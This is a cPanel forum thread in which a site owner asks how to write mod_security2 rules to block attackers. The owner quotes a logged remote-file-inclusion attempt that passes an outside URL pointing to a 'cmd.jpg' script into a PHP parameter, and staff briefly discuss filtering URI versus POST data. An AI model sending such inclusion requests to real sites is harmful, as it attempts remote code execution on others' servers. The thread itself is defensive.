Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 SuperBaby, Jan 20, 2008
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    715
    Likes Received:
    5
    Trophy Points:
    243
    #2 cPDan, Jan 21, 2008
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #3 SuperBaby, Jan 21, 2008
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    715
    Likes Received:
    5
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
    #4 cPDan, Jan 21, 2008
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #5 SuperBaby, Jan 21, 2008
(You must log in or sign up to post here.)
Loading...
Similar Threads - Create mod_security2 rules
  1. slinky

    New Thread Create reseller with its own IP shared with customers

    slinky, Jul 19, 2018 at 9:34 AM, in forum: General Discussion
    Replies:
    1
    Views:
    0
    slinky
    Jul 19, 2018 at 9:44 AM
  2. thanhdung756

    Unable to create databases?

    thanhdung756, Jul 17, 2018 at 6:08 AM, in forum: Database Discussion
    Replies:
    1
    Views:
    41
    cPanelLauren
    Jul 17, 2018 at 12:53 PM
  3. Matthew Nigro

    Cannot create a new account issue

    Matthew Nigro, Jul 14, 2018 at 11:55 PM, in forum: General Discussion
    Replies:
    2
    Views:
    50
    cPanelMichael
    Jul 16, 2018 at 12:21 PM
  4. maestroc

    Can't create files or folders in one account

    maestroc, Jul 14, 2018 at 6:49 PM, in forum: EasyApache
    Replies:
    2
    Views:
    53
    Jcats
    Jul 16, 2018 at 12:44 PM
  5. psppro26

    Create VMs with cPanel?

    psppro26, Jul 13, 2018 at 6:35 AM, in forum: General Discussion
    Replies:
    1
    Views:
    56
    cPanelLauren
    Jul 13, 2018 at 11:18 AM

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Accept Learn More...
    Dismiss Notice